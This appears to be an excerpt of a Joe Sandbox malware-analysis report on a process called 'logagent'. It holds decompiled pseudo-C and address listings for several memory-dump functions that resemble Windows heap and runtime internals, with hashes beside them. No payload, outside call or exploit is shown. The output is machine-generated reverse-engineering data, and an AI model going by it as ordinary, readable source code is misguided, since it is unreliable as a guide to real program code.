                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction ID: 4f1ec213d97098d0daefd41202f841e94cefd6f22f4646a98f72da4824d2aa85
                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction Fuzzy Hash: A1518071611606DFCB15DF54C480E66FBB5FF45304F28C0AAE9099F252E3B2E946CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E2990 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E051E2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x528ff00);
				E0520D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x5191664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E051FE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x5191668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E052351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x519166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E051E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E051C6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E051E2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E051CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E051E2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E051E2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E051E2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0520D0D1(_t62);
				goto L28;
			}





















                                              0x051e2990
                                              0x051e2992
                                              0x051e2997
                                              0x051e29a3
                                              0x051e29a6
                                              0x051e29ab
                                              0x051e29ad
                                              0x051e29b2
                                              0x05225c80
                                              0x051e29b8
                                              0x051e29b8
                                              0x051e29bb
                                              0x051e29c0
                                              0x051e29c5
                                              0x051e29c6
                                              0x051e29c6
                                              0x051e29cb
                                              0x00000000
                                              0x00000000
                                              0x051e29cd
                                              0x051e29d0
                                              0x051e29d9
                                              0x051e29db
                                              0x051e29dd
                                              0x051e2a7f
                                              0x051e2a84
                                              0x051e2a87
                                              0x051e2a89
                                              0x05225ca1
                                              0x05225ca3
                                              0x00000000
                                              0x051e2a8f
                                              0x051e2a8f
                                              0x00000000
                                              0x051e2a8f
                                              0x00000000
                                              0x051e29e3
                                              0x051e29e3
                                              0x051e29e3
                                              0x00000000
                                              0x051e29e3
                                              0x051e29dd
                                              0x00000000
                                              0x051e29db
                                              0x051e29e6
                                              0x051e29e9
                                              0x051e29eb
                                              0x051e29ed
                                              0x051e29f3
                                              0x051e29f5
                                              0x051e29f8
                                              0x051e29fa
                                              0x051e2a97
                                              0x051e2a9a
                                              0x051e2a9d
                                              0x051e2add
                                              0x00000000
                                              0x051e2a9f
                                              0x051e2aa2
                                              0x051e2aa5
                                              0x051e2aa8
                                              0x051e2aab
                                              0x05225cab
                                              0x05225caf
                                              0x05225cc5
                                              0x05225cda
                                              0x05225cdc
                                              0x05225cdf
                                              0x05225ce5
                                              0x00000000
                                              0x05225ceb
                                              0x05225ced
                                              0x05225cee
                                              0x00000000
                                              0x05225cee
                                              0x05225cb1
                                              0x05225cb4
                                              0x05225cb9
                                              0x05225cbb
                                              0x00000000
                                              0x05225cbd
                                              0x05225cbd
                                              0x00000000
                                              0x05225cbd
                                              0x05225cbb
                                              0x051e2ab1
                                              0x051e2ab1
                                              0x051e2ac4
                                              0x051e2ac6
                                              0x051e2ac6
                                              0x00000000
                                              0x051e2ac6
                                              0x051e2aab
                                              0x00000000
                                              0x051e2a00
                                              0x051e2a09
                                              0x051e2a0e
                                              0x051e2a21
                                              0x051e2a24
                                              0x051e2a35
                                              0x051e2a3a
                                              0x051e2a3d
                                              0x051e2a42
                                              0x051e2a59
                                              0x051e2a59
                                              0x051e2a5c
                                              0x051e2a5f
                                              0x051e2a5f
                                              0x051e29fa
                                              0x051e29f3
                                              0x051e2a64
                                              0x051e2a64
                                              0x051e2a6b
                                              0x051e2a6b
                                              0x051e2a6d
                                              0x051e2a72
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4eaea69d66cd1b2ce87c9b6cf9e093a601e3ea3ee34e30b6b049ef7b58e73310
                                              • Instruction ID: 88c0b5717e8765722257baaccfc3ec36f1d14bfbef6b5ebb32a3405758fb6639
                                              • Opcode Fuzzy Hash: 4eaea69d66cd1b2ce87c9b6cf9e093a601e3ea3ee34e30b6b049ef7b58e73310
                                              • Instruction Fuzzy Hash: F251AE35A00619EFCF25CF54C851AEEBBBABF88310F158015F8256B261D7358D92CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E4D3B Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E051E4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x52ad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E051FFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x52a7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E051FB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L051D4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E051BCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E051FB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E051FF380(_t67 + 0xc, 0x5195138, 0x10) == 0) {
								 *0x52a60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E051E4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E051E4E70(0x52a86b0, 0x51e5690, 0, 0) != 0) {
					_t46 = E051BCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                              0x051e4d3b
                                              0x051e4d4d
                                              0x051e4d53
                                              0x051e4d58
                                              0x051e4d65
                                              0x051e4d6c
                                              0x051e4d71
                                              0x051e4d77
                                              0x051e4d7f
                                              0x051e4d8c
                                              0x051e4d8e
                                              0x051e4dad
                                              0x051e4db0
                                              0x051e4db7
                                              0x051e4db8
                                              0x051e4db9
                                              0x051e4dba
                                              0x051e4dbb
                                              0x051e4dc1
                                              0x051e4dc8
                                              0x051e4dcc
                                              0x051e4dd5
                                              0x051e4dde
                                              0x051e4ddf
                                              0x051e4de0
                                              0x051e4de1
                                              0x051e4de6
                                              0x051e4de7
                                              0x051e4de9
                                              0x051e4df3
                                              0x00000000
                                              0x00000000
                                              0x05226c7c
                                              0x05226c8a
                                              0x05226c8a
                                              0x05226c9d
                                              0x05226ca7
                                              0x05226cac
                                              0x05226cb2
                                              0x05226cb9
                                              0x00000000
                                              0x05226cbf
                                              0x05226cbf
                                              0x00000000
                                              0x05226cbf
                                              0x05226cb9
                                              0x051e4dfb
                                              0x05226ccf
                                              0x05226cd3
                                              0x051e4e32
                                              0x051e4e39
                                              0x05226ce0
                                              0x05226cf2
                                              0x05226cf2
                                              0x05226ce0
                                              0x051e4e3f
                                              0x051e4e41
                                              0x051e4e51
                                              0x051e4e51
                                              0x051e4e03
                                              0x051e4e03
                                              0x051e4e09
                                              0x051e4e0f
                                              0x051e4e57
                                              0x00000000
                                              0x00000000
                                              0x051e4e1b
                                              0x051e4e30
                                              0x051e4e5b
                                              0x051e4e5b
                                              0x00000000
                                              0x051e4e30
                                              0x051e4e11
                                              0x051e4e11
                                              0x051e4e16
                                              0x00000000
                                              0x051e4e16
                                              0x051e4e01
                                              0x00000000
                                              0x051e4e01
                                              0x051e4da5
                                              0x05226c6b
                                              0x00000000
                                              0x051e4dab
                                              0x051e4dab
                                              0x00000000
                                              0x051e4dab

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dca676afc9cc17885aaedb64fdbb3265a131c52efaddeecbb3b702357c74cd5b
                                              • Instruction ID: 7abaf51a17b3efe6e998803be000a18a6a127c9f10b07241e6bad603c61fdac8
                                              • Opcode Fuzzy Hash: dca676afc9cc17885aaedb64fdbb3265a131c52efaddeecbb3b702357c74cd5b
                                              • Instruction Fuzzy Hash: 8A419176A40718AFEF35DF14C884FAAB7AAFF44610F044099E94997281DBB4ED84CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E4BAD Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E051E4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x52ad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E051BCC50(_t86);
					L11:
					return E051FB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x52a8504
				E051D2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E051FFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E051FB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L051D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E051BCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x52a8504
								E051CFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E051E4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                              0x051e4bad
                                              0x051e4bbf
                                              0x051e4bc2
                                              0x051e4bc6
                                              0x051e4bcd
                                              0x051e4bd9
                                              0x052267fe
                                              0x05226800
                                              0x051e4ccc
                                              0x051e4ccd
                                              0x051e4cb7
                                              0x051e4cc9
                                              0x051e4cc9
                                              0x051e4bdf
                                              0x051e4be5
                                              0x00000000
                                              0x00000000
                                              0x051e4beb
                                              0x051e4bef
                                              0x00000000
                                              0x00000000
                                              0x051e4bf5
                                              0x051e4bf9
                                              0x051e4c06
                                              0x051e4c0b
                                              0x051e4c17
                                              0x051e4c1c
                                              0x051e4c1f
                                              0x051e4c25
                                              0x051e4c33
                                              0x051e4c3d
                                              0x051e4c40
                                              0x051e4c43
                                              0x051e4c47
                                              0x051e4c4d
                                              0x051e4c53
                                              0x051e4c54
                                              0x051e4c55
                                              0x051e4c56
                                              0x051e4c5b
                                              0x051e4c5c
                                              0x051e4c63
                                              0x051e4c6b
                                              0x00000000
                                              0x00000000
                                              0x05226776
                                              0x05226784
                                              0x05226784
                                              0x0522679f
                                              0x052267a7
                                              0x052267af
                                              0x052267ce
                                              0x00000000
                                              0x052267b1
                                              0x052267b7
                                              0x052267b8
                                              0x052267c1
                                              0x052267d3
                                              0x052267d9
                                              0x052267dd
                                              0x051e4c94
                                              0x051e4c94
                                              0x051e4c98
                                              0x051e4c9c
                                              0x051e4ca3
                                              0x052267f4
                                              0x052267f4
                                              0x051e4cb5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051e4cb5
                                              0x051e4c79
                                              0x051e4c7e
                                              0x051e4c89
                                              0x051e4c8b
                                              0x051e4c8f
                                              0x051e4c8f
                                              0x00000000
                                              0x051e4c89
                                              0x052267c3
                                              0x00000000
                                              0x052267c3
                                              0x052267af
                                              0x051e4c73
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5c13ac98933a01c4b72c156575d9be4225b360e3025a2ea6669c4f3b9eff3428
                                              • Instruction ID: 3290acceed24ed0183bb108953ae51ae204c137d56c38e9e8f10181ee699df3c
                                              • Opcode Fuzzy Hash: 5c13ac98933a01c4b72c156575d9be4225b360e3025a2ea6669c4f3b9eff3428
                                              • Instruction Fuzzy Hash: 6141B336A00629ABCF30DF64D944FEAB7B5FF45710F0104A5E909AB241DBB4EE84CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05282B28 Relevance: .1, Instructions: 129COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E05282B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x52a6110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E051D2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x52a6110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E0528241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E051CFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E05283209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E0527A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E051CFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E0527A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x52a6110; // 0x5d667ca3
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                              0x05282b28
                                              0x05282b30
                                              0x05282b35
                                              0x05282b37
                                              0x05282b3a
                                              0x05282b3d
                                              0x05282b44
                                              0x05282b4d
                                              0x05282b4d
                                              0x05282b50
                                              0x05282b54
                                              0x05282bb0
                                              0x05282bbd
                                              0x05282be8
                                              0x05282bef
                                              0x05282bf4
                                              0x05282bf7
                                              0x05282bfa
                                              0x05282bfd
                                              0x05282c02
                                              0x05282c02
                                              0x05282c0f
                                              0x05282c13
                                              0x05282c3b
                                              0x05282c4a
                                              0x05282c4f
                                              0x05282c52
                                              0x05282c52
                                              0x05282c59
                                              0x05282c62
                                              0x05282c62
                                              0x05282c69
                                              0x05282c15
                                              0x05282c18
                                              0x05282c19
                                              0x05282c21
                                              0x05282c29
                                              0x05282c2f
                                              0x05282c2f
                                              0x05282c29
                                              0x05282bbf
                                              0x05282bc2
                                              0x05282bc3
                                              0x05282bc9
                                              0x05282bc9
                                              0x05282c72
                                              0x05282c72
                                              0x05282b56
                                              0x05282b5c
                                              0x05282b62
                                              0x05282b64
                                              0x05282b72
                                              0x05282b77
                                              0x05282ba3
                                              0x05282ba3
                                              0x05282ba5
                                              0x05282baa
                                              0x00000000
                                              0x05282baa
                                              0x05282b7e
                                              0x05282b84
                                              0x05282b86
                                              0x05282b97
                                              0x05282b9c
                                              0x05282b9e
                                              0x05282b9e
                                              0x00000000
                                              0x05282b9e
                                              0x05282b8b
                                              0x05282b90
                                              0x00000000
                                              0x00000000
                                              0x05282b95
                                              0x00000000
                                              0x05282b95
                                              0x05282b6b
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96f3141f2d94e7815cc5bdfb873e72162da8c9f15b57b67657af2696f62f0384
                                              • Instruction ID: 5553bb792bb4abec69d23a848ff48b7af1b90816bfdd603717292c049f3e7c81
                                              • Opcode Fuzzy Hash: 96f3141f2d94e7815cc5bdfb873e72162da8c9f15b57b67657af2696f62f0384
                                              • Instruction Fuzzy Hash: 82412A77B26105EBC714EEA8C884A7BB7A9FF48220B05466DE825D72C0D774ED06C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C8A0A Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E051C8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x52ad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E051FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E051CE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x5191180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E051E1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E051F3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E051C8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
